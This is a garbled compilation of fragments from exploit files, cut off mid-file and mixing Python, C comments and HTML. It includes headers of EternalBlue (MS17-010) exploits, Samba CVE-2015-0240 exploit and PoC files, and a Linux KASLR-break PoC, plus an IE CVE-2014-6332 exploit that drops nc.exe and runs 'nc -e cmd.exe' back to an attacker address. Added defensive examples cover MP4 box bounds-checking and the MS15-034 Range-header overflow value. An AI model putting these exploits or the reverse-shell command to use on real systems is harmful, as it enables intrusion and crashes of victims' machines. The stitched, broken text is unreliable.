# -*- coding: utf-8 -*-
# Ghidra Jython script preamble: function manager, image base and the symbol source type used for renaming
import ghidra.program.model.symbol.SourceType
import re

functionManager = currentProgram.getFunctionManager()
#minAddress = currentProgram.getMinAddress()
baseAddress = currentProgram.getImageBase()
USER_DEFINED = ghidra.program.model.symbol.SourceType.USER_DEFINED

/*
This PoC is based on http://www.immunityinc.com/downloads/x86leaks_old.pdf
The PoC finds the direct physical map and kernel text addresses in a Linux kernel without PTI on Intel x64.
The PoC might not work correctly in a VM. For example, this PoC cannot find the correct direct physical map
address in KVM. The reason is in https://www.kernel.org/doc/Documentation/virtual/kvm/mmu.txt
$ ./break_linux_kaslr_nopti

# This file has no update anymore. Please see https://github.com/worawit/MS17-010
# Merge an x86 and an x64 shellcode blob into a single output file
import sys
from struct import pack

if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()

sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)

#!/usr/bin/python
"""
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c
"""
from struct import pack


def create_box(atom_type, data):
    # MP4/ISO BMFF box: 4-byte big-endian size (header included), 4-byte type, then the payload
    return pack("!I", len(data)+4+4) + atom_type + data

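The PoC builds its malformed file out of MP4 boxes with the helper above. The following is an added example, not part of the gist or of the Android sources it references: the same serializer extended to the 64-bit `largesize` form, plus the parser side with the bounds checks a demuxer needs when it walks attacker-supplied boxes (size smaller than the header, size running past the enclosing container, truncated headers). The sample file and the set of container types are constructed for the example.

```python
"""
Added example (not from the gist): serialize ISO BMFF / MP4 boxes the way the
PoC's create_box() does, then parse them back defensively.
"""
from struct import pack, unpack_from


def create_box(atom_type, data, large=False):
    """4-byte big-endian size (header included) + 4-byte type + payload.
    large=True emits the 64-bit form: size field == 1, followed by an 8-byte largesize."""
    assert len(atom_type) == 4
    if large:
        return pack("!I", 1) + atom_type + pack("!Q", len(data) + 16) + data
    return pack("!I", len(data) + 8) + atom_type + data


class BoxError(ValueError):
    """Raised for any box whose declared size cannot be trusted."""


def parse_boxes(buf, offset=0, end=None):
    """Walk the boxes in buf[offset:end].
    Returns [(type, header_len, payload_len, payload_offset), ...] and rejects
    sizes that are smaller than the header or larger than what remains."""
    if end is None:
        end = len(buf)
    boxes = []
    while offset < end:
        remaining = end - offset
        if remaining < 8:
            raise BoxError("truncated header at offset %d" % offset)
        size, = unpack_from("!I", buf, offset)
        atom_type = buf[offset + 4:offset + 8]
        header = 8
        if size == 1:                     # 64-bit largesize follows the type
            if remaining < 16:
                raise BoxError("truncated largesize at offset %d" % offset)
            size, = unpack_from("!Q", buf, offset + 8)
            header = 16
        elif size == 0:                   # box extends to the end of its container
            size = remaining
        if size < header:
            raise BoxError("box %r at %d: size %d smaller than header" % (atom_type, offset, size))
        if size > remaining:
            raise BoxError("box %r at %d: size %d exceeds remaining %d" % (atom_type, offset, size, remaining))
        boxes.append((atom_type, header, size - header, offset + header))
        offset += size
    return boxes


# Container boxes whose payload is itself a sequence of boxes (subset, for the example).
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"edts", b"dinf", b"udta"}


def walk(buf, offset=0, end=None, depth=0):
    """Recursively list (depth, type, payload_len), descending into known containers."""
    out = []
    for atom_type, header, payload_len, payload_off in parse_boxes(buf, offset, end):
        out.append((depth, atom_type, payload_len))
        if atom_type in CONTAINERS:
            out.extend(walk(buf, payload_off, payload_off + payload_len, depth + 1))
    return out


def is_rejected(buf):
    """True if the parser refuses the buffer."""
    try:
        parse_boxes(buf)
        return False
    except BoxError:
        return True


# Constructed sample: ftyp + moov{ mvhd, trak{ tkhd } }
SAMPLE = create_box(b"ftyp", b"isom" + pack("!I", 0)) + create_box(
    b"moov",
    create_box(b"mvhd", b"\x00" * 100) + create_box(b"trak", create_box(b"tkhd", b"\x00" * 84)),
)

if __name__ == "__main__":
    for depth, atom_type, payload_len in walk(SAMPLE):
        print("  " * depth + atom_type.decode() + " payload=%d" % payload_len)
    print("size-4 box rejected:", is_rejected(pack("!I", 4) + b"free"))
```

The two rejection branches are the ones that matter for a parser handed untrusted media: a size below 8 would make `size - header` negative (or wrap, in C), and a size above the remaining bytes lets a later read run off the end of the buffer.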
/*
Pseudo code in HTTP.sys to understand the flow related to MS15-034
All pseudo code is reversed from the vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone who wants to know which functions were patched:
just open the patched version and find all functions that reference RtlULongLongAdd().
*/

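The hint above (diff the patched HTTP.sys by looking for callers of RtlULongLongAdd()) is the whole story of the fix: additions that previously wrapped now go through a checked helper. The following is an added example, not part of the gist or of HTTP.sys: a Python model of the RtlULongLongAdd() semantics from ntintsafe.h (returns STATUS_INTEGER_OVERFLOW instead of a wrapped sum), applied to the HTTP Range header through which MS15-034 (CVE-2015-1635) was triggered. The Range parsing and the length computation are an illustration of the checked-versus-unchecked difference, not HTTP.sys's actual code; the NTSTATUS values are the standard ones.

```python
"""
Added example (not from the gist): RtlULongLongAdd() semantics modelled in
Python and applied to Range-header arithmetic.
"""
import re

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_PARAMETER = 0xC000000D
STATUS_INTEGER_OVERFLOW = 0xC0000095
ULONGLONG_MAX = 0xFFFFFFFFFFFFFFFF

_RANGE_SPEC = re.compile(r"^(\d+)-(\d+)$")


def rtl_ulonglong_add(a, b):
    """Model of RtlULongLongAdd(): (status, sum). The sum is 0 unless status is success."""
    total = a + b
    if total > ULONGLONG_MAX:
        return STATUS_INTEGER_OVERFLOW, 0
    return STATUS_SUCCESS, total


def parse_ranges(header):
    """Parse 'bytes=a-b, c-d' into (status, [(first, last), ...]).
    Each bound must fit a ULONGLONG and last >= first. Suffix ('-500') and
    open-ended ('500-') forms are out of scope here and are rejected."""
    if not header.startswith("bytes="):
        return STATUS_INVALID_PARAMETER, []
    ranges = []
    for spec in header[len("bytes="):].split(","):
        m = _RANGE_SPEC.match(spec.strip())
        if not m:
            return STATUS_INVALID_PARAMETER, []
        first, last = int(m.group(1)), int(m.group(2))
        if last > ULONGLONG_MAX or last < first:
            return STATUS_INVALID_PARAMETER, []
        ranges.append((first, last))
    return STATUS_SUCCESS, ranges


def total_length_unchecked(ranges):
    """Sum of (last - first + 1) with C-style 64-bit wraparound: plain ULONGLONG arithmetic."""
    total = 0
    for first, last in ranges:
        total = (total + (last - first + 1)) & ULONGLONG_MAX
    return total


def total_length_checked(ranges):
    """Same sum, but every addition goes through rtl_ulonglong_add(); fails closed on overflow."""
    total = 0
    for first, last in ranges:
        status, length = rtl_ulonglong_add(last - first, 1)
        if status != STATUS_SUCCESS:
            return status, 0
        status, total = rtl_ulonglong_add(total, length)
        if status != STATUS_SUCCESS:
            return status, 0
    return STATUS_SUCCESS, total


if __name__ == "__main__":
    # The header value used in the public MS15-034 check: 18446744073709551615 == 2**64 - 1
    for hdr in ("bytes=0-99, 200-299", "bytes=0-18446744073709551615"):
        status, ranges = parse_ranges(hdr)
        print(hdr)
        print("  unchecked length: %d" % total_length_unchecked(ranges))
        print("  checked:          status=0x%08X length=%d" % total_length_checked(ranges))
```

With `bytes=0-18446744073709551615` the unchecked computation yields a length of 0 while the request actually spans the whole 64-bit space; the checked version returns STATUS_INTEGER_OVERFLOW and never produces a length at all, which is exactly the behaviour change a caller of RtlULongLongAdd() gets.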
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 where 'creds' is controlled by the
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on the 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

#!/usr/bin/python
"""
PoC for Samba vulnerability (CVE-2015-0240) by sleepya
This PoC only triggers the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries

<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)